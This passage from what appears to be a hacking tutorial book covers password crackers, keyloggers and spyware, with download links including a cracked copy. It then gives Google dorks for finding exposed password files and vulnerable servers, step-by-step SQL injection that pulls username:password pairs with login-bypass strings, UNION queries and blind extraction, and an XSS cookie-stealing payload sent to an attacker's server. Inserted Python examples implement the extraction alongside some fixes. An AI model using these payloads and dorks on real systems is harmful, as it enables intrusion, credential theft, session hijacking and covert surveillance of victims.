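    for candidate in (core, core.translate(LEET), low.translate(LEET)):
        if candidate and candidate in wordlist:
            return "hybrid"
    return "brute-force"


def check_policy(pw, min_bits=60):
    """Return (accepted, reasons). Accept only when no word-list attack
    applies and the brute-force keyspace is at least min_bits."""
    reasons = []
    kind = classify(pw)
    if kind != "brute-force":
        reasons.append(f"would be found by a {kind} attack")
    bits = brute_force_bits(pw)
    if bits < min_bits:
        reasons.append(f"only {bits:.0f} bits of brute-force keyspace (< {min_bits})")
    return (not reasons, reasons)


if __name__ == "__main__":
    for candidate in ("password", "P@ssw0rd123", "abcdefgh", "xK9#vQ2mL!pT"):
        ok, why = check_policy(candidate)
        print(f"{candidate:14s} {'OK' if ok else 'REJECT'} {'; '.join(why)}")
```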

Password Crackers

Abcom PDF Password Cracker is a program that breaks the security of PDF documents.


Page 39: Hackdecoders- Book by Hitesh Malviya

Download Link: http://abcom-pdf-password-cracker-pro.findmysoft.com/download/

L0phtcrack: It is an SMB packet capture tool used to crack LC4 segment passwords.

Download Link: http://www.net-security.org/software.php?id=756

RainbowCrack: It is a tool used to crack hashes by looking them up among the precomputed hashes stored in a rainbow table.


Page 40: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.net-security.org/software.php?id=515

John the Ripper: It is a command line tool designed to crack both UNIX and NT passwords.

Download Link: http://www.openwall.com/john/

Ophcrack: It is a Windows password cracker based on a faster time-memory trade-off. It uses rainbow tables. It can crack 99% of passwords (passwords of length 6 or less composed of any characters, alphanumeric passwords of length 7 (both cases) and length 8 (lowercase only)).

Download Link: http://ophcrack.sourceforge.net/


Page 41: Hackdecoders- Book by Hitesh Malviya

Keylogger

A keylogger is a remote administration tool used by hackers to record activities on a remote machine. It records the keystrokes entered by a user on the remote machine and saves a log file on the system. It always works in hidden mode. We can grab all kinds of user accounts by using this tool; we only have to manage to install the keylogger on the remote machine. Once you have managed to install the keylogger on the remote machine, it will periodically send log files to your server. There are two types of keyloggers:

Hardware keylogger
Software keylogger

Ardamax Keylogger

Ardamax Keylogger is a keystroke recorder that captures the user’s activity and saves it in an encrypted log file. Logs can be automatically sent to your email address, and access to the keylogger is password protected. It runs in invisible mode.

Download Link: http://www.box.net/shared/lidooniyjv


Page 42: Hackdecoders- Book by Hitesh Malviya

Actual Spy Keylogger

It is designed for hidden computer monitoring. It is capable of capturing all keystrokes, screens, clipboards, website activity and print activity.

Download Link: http://www.4shared.com/file/J28nUoDK/Actual_Spy_3_Crack.html

Spyware

Spyware is a program that records computer activities on a machine. It:
Records keystrokes
Records email messages
Records IM chat sessions
Records websites visited
Records applications opened
Captures screenshots

Acespy

It separately records everything that is done on the computer and can also block websites or programs.


Page 43: Hackdecoders- Book by Hitesh Malviya

Download Link: http://download.cnet.com/AceSpy-Spy-Software/3000-2162_4-10206540.html

eBlaster

It shows what the surveillance target surfs on the internet and records all emails, chats, instant messages, websites visited and keystrokes typed, and automatically sends this recorded information to the desired email address.


Page 44: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.eblaster-download.com/

PCPhoneHome

The PCPhoneHome tool tracks stolen laptops: when the stolen laptop is online, it sends a stealth message to a predetermined email address containing its exact location.

Install the software and restart the computer.
Start -> Run -> configmod
Enter your email address.
That’s all. Whenever your system is online, you will receive a notification through email.

Download Link: www.pcphonehome.com


Page 45: Hackdecoders- Book by Hitesh Malviya

Keylogger countermeasures

Install antivirus and keep the signatures up-to-date.
Use a privacy keyboard while entering important user account names or passwords. You can download a privacy keyboard from http://anti-keylogger.com
Install a host-based IDS on your system.
Install anti-keylogger software on your system. You can get it from http://www.anti-keyloggers.com/download.html


Page 46: Hackdecoders- Book by Hitesh Malviya

Chapter 6 Google Hacking (Basic & Advanced)

Objectives:

Error messages

Files containing juicy information

Advisories & vulnerabilities

Files containing usernames

Files containing passwords

Pages containing login portals

Various online devices

Vulnerable servers


Page 47: Hackdecoders- Book by Hitesh Malviya

Google hacking is the art of grabbing information using the Google search engine. A few operators are used for this purpose. Mostly Google hacking is used for finding vulnerable files and servers. You can also use Google hacking to filter search results. String keywords used for this purpose are called Google dorks. You can get the Google Hacking Database from http://www.hackersforcharity.org/ghdb/ and can try the dorks given in the database.

Here are some examples of Google hacking:

Error messages

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
This dork reveals logins to databases that were denied for some reason.

"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
PHP error with a full web root path disclosure.

"Warning: mysql_query()" "invalid query"
MySQL query errors revealing database schema and usernames.

filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
This search will show an attacker some PHP error logs which may contain information on which an attack can be based.

IIS web server error messages
intitle:"the page cannot be found" "internet information services"
This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into.


Files containing juicy info

"phpMyAdmin" "running on" inurl:"main.php"
From phpmyadmin.net: "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, showing processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker fodder for sure!

"robots.txt" "Disallow:" filetype:txt
The robots.txt file serves as a set of instructions for web crawlers. The "Disallow" directive tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!

allinurl:cdkey.txt
CD keys.

Exported email addresses
e-mail address filetype:csv csv
Loads of user information, including email addresses, exported in comma separated file format (.csv). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation.

filetype:conf inurl:firewall -intitle:cvs
These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes.

filetype:reg "Terminal Server Client"
These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses.

Financial spreadsheets: finance.xls
intitle:"Index of" finance.xls

"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"


Advisories & vulnerabilities

"Active Webcam Page" inurl:8080
Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross-site scripting.

"Online Store - Powered by ProductCart"
ProductCart is "an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites". Multiple SQL injection vulnerabilities have been found in the product; they allow anything from gaining administrative privileges (bypassing the authentication mechanism) to executing arbitrary code.

"Powered by A-CART"
A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. A security vulnerability in the product allows remote attackers to download the product's database and thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and the user's login password).

"Powered by GTChat 0.95"+"User Login"+"Remember my login information"
There is an (adduser) remote denial of service vulnerability in version 0.95.

Files containing usernames

filetype:reg reg +intext:"internet account manager"
This Google search reveals user names, POP3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases.

inurl:admin filetype:asp inurl:userlist
This search reveals user lists of administrative importance. User lists found using this method can range from benign "message group" lists to system user lists containing passwords.

inurl:admin inurl:userlist
Same idea without the file type restriction: user lists ranging from benign "message group" lists to system user lists containing passwords.

site:extremetracking.com inurl:"login="
The search reveals usernames (right in the URL, in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the site's stats, including all the visitors to the site being tracked and their IP addresses.


Files containing passwords

ext:php intext:"$dbms" "$dbhost" "$dbuser" "$dbpasswd" "$table_prefix" "phpbb_installed"
Hacking a phpBB forum. Here you can gather the MySQL connection information for the forum database. View the .php source by using Google's cache feature.

filetype:ini wcx_ftp
This searches for Total Commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future.

filetype:log inurl:"password.log"
These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.

filetype:sql "insert into" (pass|passwd|password)
Looks for SQL dumps containing cleartext or hashed passwords.

Pages containing login portals

"site info for" "Enter Admin Password"
This will take you to the Cash Crusader admin login screen. It is my first Google hack.. also try adding index.php at the end, have fun people :)

intext:"vbulletin" inurl:admincp
vBulletin Admin Control Panel.

inurl:login.asp
This is a typical login page. It has recently become a target for SQL injection.

inurl::2082/frontend -demo
This finds cPanel login dialogues/screens (port 2082 is cPanel's default HTTP port).

Various online devices

intitle:"ipcop - main"
IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google hackers ;)


intitle:"IVC Control Panel"
IVC camera control panels.

intitle:"Live NetSnap Cam-Server feed"
NetSnap online cameras.

intitle:"V1" "welcome to phone settings" password
This is a small search for the iTalk BB899 phone adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.

Vulnerable servers

intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
Search for phpMyAdmin installations that are configured to connect to the MySQL database as root.

"html allowed" guestbook
When this is typed into Google it finds websites which have HTML-enabled guestbooks.

"Welcome to PHP-Nuke" congratulations
This finds default installations of the PHP-Nuke CMS. In many cases default installations are insecure, especially considering that the administrator hasn't gotten past the first few installation steps.

"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
This reveals the admin site for the Argo Software Design mail server.

You can use an automated Google hacking tool to make the work easier. Goolag Scanner is an automated tool used for Google hacking.

Download Link: http://downloadsquad.switched.com/tag/goolag%20scanner/


Chapter 7 SQL Injection & Countermeasures

Objectives:

Some strings used to perform SQL injection
Some Google dorks to find vulnerable login portals
How to hack a website using SQL vulnerable strings
Error based SQL injection
Blind SQL injection
Google dorks to find SQL injection vulnerable websites
Automated tools
SQL injection countermeasures


SQL injection is a technique for manipulating the database queries a web application builds from user input. The classic use is bypassing the user authentication of a web form (login portal): an attacker supplies a malicious string to the form, and the query it ends up in takes the attacker into the admin area of the website. Once in the admin area, an attacker can add or delete files and play with the website's contents.

Some strings used to perform SQL injection

' or 1=1--
' or ''='
' or 'a'='a
hi' or 1=1 --

Some Google dorks to find vulnerable login portals

/admin/adminlogon.asp
/admin/admin_login.asp
/admin/admin_logon.asp
/administrator/admin.asp
/administrator/login.asp

How to hack a website using SQL vulnerable strings

Find a vulnerable login portal using the Google dorks mentioned above. Give any SQL string as input to both the username and password fields. Try the strings one by one until you succeed in gaining access to the admin area. The strings work because the application builds its query by pasting the fields into a string such as SELECT * FROM users WHERE username='...' AND password='...': the leading quote closes the literal, or 1=1 makes the condition always true, and -- comments out the rest of the query.


Error Based SQL Injection

1). Check for vulnerability

Let's say we have a site like this: http://www.site.com/news.php?id=1
To test whether it is vulnerable we add a ' (single quote) to the end of the URL, giving http://www.site.com/news.php?id=1'
If it is vulnerable you should get an SQL error such as

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"

or something like that.

2). Find the number of columns

To find the number of columns we use the ORDER BY clause. Normally it tells the database how to sort the result; here we use it to find how many columns the query selects, because ORDER BY n fails as soon as n exceeds the column count. Type order by 1/* (or 1--) and keep adding one until you get an error.

Example:
http://www.site.com/news.php?id=1 order by 1/* <-- no error
http://www.site.com/news.php?id=1 order by 2/* <-- no error
http://www.site.com/news.php?id=1 order by 3/* <-- no error
http://www.site.com/news.php?id=1 order by 4/* <-- an error
This means the query selects only 3 columns, because we got an error after order by 3.

3). Check for UNION

UNION appends the rows of a second SELECT to the original result, which lets us show data from tables and columns of our choosing.

Example:
http://www.site.com/news.php?id=1 union all select 1,2,3/* (or 3--; we know there are 3 columns)
If you see the numbers on the page then UNION is working. Try -- in place of /* if the query doesn't give any result.


4). Check for MySQL version

If you get, say, the number 1 displayed, that is the position where we insert @@version or version() (both return the version of the database).

Example:
http://www.site.com/news.php?id=1 union all select @@version,2,3/*

You may get an "Illegal mix of collations (IMPLICIT + COERCIBLE)" kind of error. If you get such an error with the above query, wrap the value so it is returned as a plain byte string, for example with unhex(hex(...)) or the convert() function.

Example:
http://www.site.com/news.php?id=1 union all select unhex(hex(@@version)),2,3/*

5). Getting table and column names

If the MySQL version is < 5 (e.g. 4.1.33, 4.1.12...) there is no information_schema, so we need to guess table names in most cases. Some names to try: user, admin, member, username, usr, user_name, password, pass, passwd, pwd etc.

Example:
http://www.site.com/news.php?id=1 union all select 1,2,3 from admin/*

If we still see a number (1, 2 or 3) on the page, the table admin exists in the database; if the table does not exist the query errors out.

Now check column names.

Example (find username):
http://www.site.com/news.php?id=1 union all select 1,username,3 from admin/*
If you get an error the column doesn't exist.

If it works you will get a username displayed on the page, for example admin or superadmin.

Example (find password):
http://www.site.com/news.php?id=1 union all select 1,password,3 from admin/*
If you get an error the column doesn't exist.

If it worked, you will see a password on the page, either as a hash or in plain text. To pull several columns through one output position, join them with the concat() function, which concatenates the strings you give it.


Example:
http://www.site.com/news.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*

(0x3a is the hex code for a colon; you could also use char(58), its ASCII value.) If it worked you will see the usernames and passwords in the form username:password

Some admins rename the columns, but you can read mysql.user instead (if the application's database user has the privilege to do so).

Example:
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

If the MySQL version is >= 5

Find table names

We use the table_name column of information_schema.tables for this purpose.

Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables.

If the page shows only one row, we add LIMIT to the end of the query to step through the tables one at a time.

Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

We change limit 0,1 to limit 1,1 to view the 2nd table.

Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table will be displayed. Put limit 2,1 to get the 3rd table.

Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*


We keep adding one until we get something useful like db_admin, poll_user, auth, auth_user etc.

Find column names:

Here we use the column_name column of information_schema.columns (add where table_name='users' to restrict it to the table you found).

Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column will be displayed.

Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column will be displayed. Put limit 2,1 to get the 3rd column, and so on.

Example (finding password):
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

You will get the data in this format: user:password(or hash):email
example: admin:hash:[email protected]

Blind SQL Injection

1). Check for vulnerability

Let's say we have a site like this: http://www.site.com/news.php?id=1
To test whether it is vulnerable we add and 1=1 (always true) to the end of the URL, then and 1=2 (always false). If the page looks normal with the true condition but changes (for example the article goes missing) with the false one, the website is vulnerable to blind SQL injection.

2). Check for MySQL version

We use substring() to test the MySQL version one character at a time.

Example:
http://www.site.com/news.php?id=1 and substring(@@version,1,1)=4


This returns TRUE if the version is 4. Replace 4 with 5; if the query then returns TRUE the version is 5. If a plain comparison doesn't work we can use a subselect.

3) Find table names

You need to guess table and column names.

Example:
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

With limit 0,1 our subquery returns exactly 1 row, which matters because a subselect used in a comparison must return only 1 row. If the page loads normally without content missing, the table users exists. If we get FALSE (some article missing), we need to change the table name until we guess the right one.

4) Find column names

As before, we have to guess the column name.
Example:
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

Here we prepend 1 to the column password, then substring returns the first character (1,1), which is 1 whenever the column exists; if the column doesn't exist the query errors out and the page changes.

5) Extract data from the database

We need to pull the data out one character at a time.
http://www.site.com/news.php?id=1 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

This extracts the first character of the first row in table users. substring here returns the first character, 1 character in length. ASCII() converts that character into its ASCII value, which is then compared using >. So if the ASCII value is greater than 80, the page loads normally (TRUE). We keep raising the number until we get FALSE.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
Here we get FALSE, while >98 is TRUE, so the first character is char(99). Using an ASCII table we know that char(99) is the letter 'c'. Now let's check the second character.


http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that we changed ,1,1 to ,2,1 to get the second character; substring now returns the second character, 1 character in length. TRUE, the page loads normally: go higher.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE: go lower.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE: higher.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!

We know that the second character is char(105), which is 'i'. We have 'ci' so far, so we keep incrementing the position until we reach the end (when >0 returns FALSE we know that we have reached the end of the string).

Blind SQL injection is a very time-consuming method; the comparisons above are really a binary search over the character value, and automated tools do exactly that. sqlmap is one of the best tools for this purpose.
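The whole error-based and blind procedure above, run against a constructed stand-in for news.php?id= (an in-memory SQLite database with made-up news and admin tables). This is an added example, not code from the book: it shows the unquoted-parameter bug, the ORDER BY column count, UNION extraction, and boolean-blind extraction where the '>80, >99, ...' probing is replaced by a binary search. SQLite is used so it runs offline; its unicode() and substr() stand in for MySQL's ASCII() and substring(), and -- is used as the comment terminator. The table and column names, the hash value and the marker string are all assumptions.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the target: a news table the page reads from
    and an admin table we want to steal (sample data, not from the book)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'First post', 'Hello world');
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_news(conn, id_param):
    """The bug from the chapter: the id parameter is concatenated into the
    query. Returns (rows, error_text); error_text plays the role of the
    verbose SQL error page that step 1 looks for."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)


def count_columns(conn, max_cols=10):
    """Step 2: ORDER BY n succeeds until n exceeds the column count, so the
    last n that worked is the number of columns (3 here)."""
    for n in range(1, max_cols + 1):
        _, err = vulnerable_news(conn, f"1 ORDER BY {n}-- ")
        if err:
            return n - 1
    return None


def union_extract(conn, table, expr, marker="XMARKX"):
    """Steps 3-5: UNION ALL a row of our own onto the real result. The marker
    in column 1 tells us which of the returned rows is ours; column 2 carries
    the expression we want (e.g. username || ':' || password)."""
    ncols = count_columns(conn)
    cols = [f"'{marker}'", expr] + [str(i) for i in range(3, ncols + 1)]
    payload = f"1 UNION ALL SELECT {', '.join(cols)} FROM {table}-- "
    rows, _ = vulnerable_news(conn, payload)
    return [row[1] for row in rows if row[0] == marker]


def oracle(conn, condition):
    """Blind oracle: the page 'loads normally' (rows come back) only when the
    injected condition is true."""
    rows, _ = vulnerable_news(conn, f"1 AND ({condition})")
    return bool(rows)


def blind_extract(conn, subquery, max_len=64):
    """Character-by-character extraction. Each character costs about seven
    oracle queries (binary search over 0..127) instead of the linear
    '>80, >99, ...' walk shown in the text."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = f"unicode(substr(({subquery}),{pos},1))"
        if not oracle(conn, f"{ch} > 0"):    # '>0' false: end of the string
            break
        lo, hi = 0, 127                      # invariant: lo < code point <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(conn, f"{ch} > {mid}"):
                lo = mid
            else:
                hi = mid
        out += chr(hi)
    return out


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_news(db, "1'")[1])                    # step 1: the tell-tale error
    print(count_columns(db))                               # step 2: 3
    print(union_extract(db, "admin", "username || ':' || password"))
    print(blind_extract(db, "SELECT username || ':' || password FROM admin LIMIT 1"))
```

Against MySQL the same payloads read concat(username,0x3a,password), ASCII() and substring(), and the comment terminator is /* or -- followed by a space; the control flow is identical.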

Google dorks to find SQL injection vulnerable websites

Here are some Google dorks you can use to find SQL injection vulnerable websites.

inurl:index.php?id=

inurl:trainers.php?id=


inurl:buy.php?category=

inurl:article.php?id=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

You can get the full list from: http://www.invisblenandu.com/2011/04/5000-sql-dorks.html

Automated Tools

SQL injection vulnerability scanners and SQL injection exploiters are used to perform penetration testing for SQL injection vulnerabilities in web applications.

SQL injection vulnerability scanners

Scrawlr: it crawls a website while simultaneously analysing the parameters of each individual web page for SQL injection vulnerabilities.


Download Link:http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx

WebCruiser: it crawls the website for SQL injection, XPath injection and XSS vulnerabilities.

Download Link: http://sec4app.com/


SQL injection exploitation tools

Havij: Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page.

Download Link: http://itsecteam.com/en/projects/project1_page2.htm

sqlmap: an SQL injection tool capable of enumerating entire remote databases and performing active database fingerprinting.


Download Link: sqlmap.sourceforge.net/

BobCat: it is based on a tool named "Data Thief" that was published as a PoC by AppSecInc. BobCat can exploit SQL injection bugs in web applications.

Download Link: www.securiteam.com/tools/5HP011FHPO.html

SQL Inject Me: SQL Inject Me is the Exploit-Me tool used to test for SQL injection vulnerabilities. The tool works by submitting your HTML forms with the form values substituted by attack strings.


Download Link:https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me

SQL Injection Countermeasures

SQL injection is a somewhat complex vulnerability and the fix usually depends on which type of application you are developing. But in spite of its complexity and the different types of injection, SQL injection is one of the easiest vulnerabilities to counter. The following measures can be used against SQL injection attacks.

1. As told earlier, SQL injection occurs because user input is pasted into the query unchecked. So our first step is to keep input out of the query text: at the developer level, build the application on parameterized queries (prepared statements), where the SQL contains placeholders and the values are sent separately, so a quote in the input can never end the literal. Escaping single quotes and validating input (rejecting expression-like values such as 1 + 1 or x + y where a number is expected) are useful extra layers, but on their own they are easy to get wrong.

2. The second solution at the developer level is to use Application Programming Interfaces (APIs) that do the parameterization for you. Today nearly every web application development framework has a database API which handles SQL queries on its own; it is better to use them because they not only reduce the overall development overhead but also provide protection against SQL injection.

3. At the system level, let the application run with the lowest privileges with which it can still work. There is no need to grant the application more privileges than required. It might take a little time to set up, but doing so stops an attacker from retrieving sensitive data (the union select from mysql.user shown earlier, for instance) since the database account's privileges will be limited.

4. Lastly, remove unnecessary database packages from your system: they not only take extra memory and disk space, but if any of them is vulnerable your database becomes vulnerable too.

Depending on what kind of application you are developing, some more modifications may be needed during development to avoid injection. But at a practical level the countermeasures above can be applied to any kind of web application to protect it against SQL injection.
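The login bypass from the strings section (' or 1=1-- and ' or 'a'='a) beside the parameterized fix from countermeasure 1, as an added example not taken from the book. The users table and its one account are constructed, and the password is stored in clear only to keep the demonstration short; a real application stores a salted hash.

```python
import sqlite3


def build_db():
    """Constructed sample: one account in a users table (not from the book)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'correct-horse-battery-staple');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """String-built query, the pattern the chapter's login strings target.
    With username ' or 1=1-- the WHERE clause becomes
        username='' or 1=1--' AND password='...'
    so the comparison is always true and the rest is commented out."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """The fix: placeholders. The driver sends the values separately from the
    statement text, so quotes, 'or' and '--' in the input are just data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "' or 1=1--", "anything"))       # admin
    print(login_vulnerable(db, "admin", "' or 'a'='a"))          # admin
    print(login_parameterized(db, "' or 1=1--", "anything"))     # None
    print(login_parameterized(db, "admin", "correct-horse-battery-staple"))
```

The same two functions also illustrate countermeasure 3: if the database account used by login_parameterized has only SELECT on users, even a future injection elsewhere cannot reach mysql.user or information_schema data it has no rights to.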


Chapter 8 Cross site scripting attack & countermeasures

Objectives:

Types of XSS
How to find an XSS vulnerability
Basic injection codes
Advanced injection codes
Google dorks to find search boxes on websites
XSS vulnerability scanners
XSS exploitation automated tools


XSS (cross-site scripting) is one of the most common vulnerabilities found in web applications. An attacker can exploit it to steal the session cookies of users of the web application, and with those cookies take over the users' logged-in sessions. XSS is basically a client-side attack: the attacker's own content (HTML or script) is added to the web page and rendered or executed in the victim's browser.

Types of XSS

There are three types of cross-site scripting, commonly known as:
DOM Based
Persistent
Non-Persistent

DOM Based

In DOM-based XSS the server is not involved: the page's own JavaScript reads attacker-controlled data (typically from the URL, such as the fragment after # or a query parameter) and writes it into the document without encoding, so the attacker's script runs in the victim's browser when the crafted link is opened. As with the other types, what the attacker gains is the victim's session on that site, not control of the victim's machine: the script runs with the privileges of the page inside the browser, not with the user's privileges on the operating system.

Persistent

In persistent (stored) XSS, the attacker doesn't need to pass a crafted URL through a search box. The web page itself lets the attacker store data through a form field, and that data is served to every later visitor, changing the page's appearance or running script. A guestbook is the typical example of this kind of vulnerability.

Non-Persistent

This is the most commonly found type on the net. It is called non-persistent (reflected) because it works on the immediate HTTP response from the victim website: an attacker puts arbitrary HTML in a search box (or URL parameter) and the site reflects it back, rendered, in the results page.

How to find an XSS vulnerability

We need to find a search box, shout box, guestbook or any web form that echoes our input. We can find search pages with the Google dork inurl:search.php?q= and then test them with the injection codes below.

Basic injection codes

http://website.com/search.php?q=<script>alert("Hindustan Cyber force")</script>

http://website.com/search.php?q=<br><br><b><u>Hindustan cyber force</u></b>

http://website.com/search.php?q=<html><body><IMG SRC="http://website.com/IMAGE.png"></body></html>

http://website.com/search.php?q=<html><body><h1><b>Hindustan cyber force</b></h1></body></html>

Advanced injection codes

Cookie stealing

We have to download a cookie logger script before proceeding. We can get a cookie logger script from http://www.ziddu.com/download/13227521/cookiestealer.zip.html. After downloading the file we have to upload the cookie logger to a web hosting server, for example 110mb.com. We have to create the file "log.txt" and chmod it to 777. Now we have to find an XSS vulnerable website and inject the following code (inside a <script> tag) into the search box:

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


Now when a user visits the injected page, the browser is sent to our server with the cookie in the URL, the logger writes it to log.txt, and with the cookie we can hijack their session. The second form is the more stealthy one. Note that cookies set with the HttpOnly flag are not readable from document.cookie, so this particular payload cannot steal them.
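A constructed stand-in for the search.php?q= page, added here and not part of the book: the reflected (non-persistent) handler, the alert and cookie-exfiltration payloads from this chapter, the output-encoding fix, and the HttpOnly flag as the second layer that keeps the session cookie out of document.cookie. The page template, the cookie name and the logger URL are placeholders.

```python
import html

# Constructed page template; the only dynamic part is the reflected query.
PAGE = "<html><body><h1>Search</h1><p>Results for: {q}</p></body></html>"

# The chapter's two payload shapes (logger host is a placeholder).
ALERT_PAYLOAD = '<script>alert("xss")</script>'
COOKIE_PAYLOAD = ('<script>document.location="http://yourServer.com/'
                  'cookielogger.php?c="+document.cookie</script>')


def search_vulnerable(q):
    """Reflects the query into the page untouched: whatever markup or script
    the attacker put in the URL is parsed and run by the victim's browser."""
    return PAGE.format(q=q)


def search_fixed(q):
    """Encodes <, >, &, " and ' before reflecting, so the payload is shown as
    text instead of being parsed as markup."""
    return PAGE.format(q=html.escape(q, quote=True))


def contains_live_script(rendered_html):
    """Demo check: does the response still carry a raw <script> tag?"""
    return "<script>" in rendered_html.lower()


def set_cookie_header(name, value, http_only=True, secure=True):
    """Second layer: an HttpOnly cookie is never exposed to document.cookie,
    so even a successful injection cannot read it. Secure keeps the cookie
    off plain-HTTP requests."""
    parts = [f"{name}={value}", "Path=/"]
    if http_only:
        parts.append("HttpOnly")
    if secure:
        parts.append("Secure")
    return "Set-Cookie: " + "; ".join(parts)


if __name__ == "__main__":
    print(search_vulnerable(COOKIE_PAYLOAD))   # script tag survives: exploitable
    print(search_fixed(COOKIE_PAYLOAD))        # &lt;script&gt;...: inert text
    print(set_cookie_header("PHPSESSID", "abc123"))
```

Encoding on output is the fix for every reflection point, not only search boxes; the HttpOnly flag is a damage limiter that protects the session cookie even when an encoding step is missed somewhere else.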

How to find persistent XSS vulnerable websites

We need to find guestbooks which allow arbitrary HTML from users.
Google Dork: "html enabled" guestbook

It lists search results consisting of HTML-enabled guestbooks. We can add arbitrary HTML and submit it to the server. An attacker can add images, flash videos and hyperlinks to the guestbook using the allowed HTML tags; this is known as HTML injection.

Google dorks to find search boxes on websites

inurl:search.php?p=
inurl:search.php?name=
inurl:search.php?q=
inurl:search.php?m=

Download the full list of Google dorks from the link given below:
http://pastebin.com/5RukrgTc

XSS vulnerability scanners

Standard web application scanners like w3af, Acunetix and IBM Rational AppScan scan websites for XSS vulnerabilities.

Download link for w3af: http://sourceforge.net/projects/w3af/
Download link for Acunetix: http://www.acunetix.com/vulnerability-scanner/download.htm
Download link for IBM Rational AppScan: http://www.ibm.com/developerworks/downloads/r/appscan/


XSS exploitation automated tools

XSSer is a tool used to exploit XSS vulnerabilities in web applications.

We can also use the Firefox add-on XSS Me for the same purpose; it provides a number of payloads for testing XSS in web applications.


Chapter 9 Remote file inclusion & Countermeasures

Objectives:

Google dorks to find vulnerable websites
How to identify the vulnerability in a website
How to exploit the vulnerability
Vulnerability scanners
Exploitation tools
Countermeasures


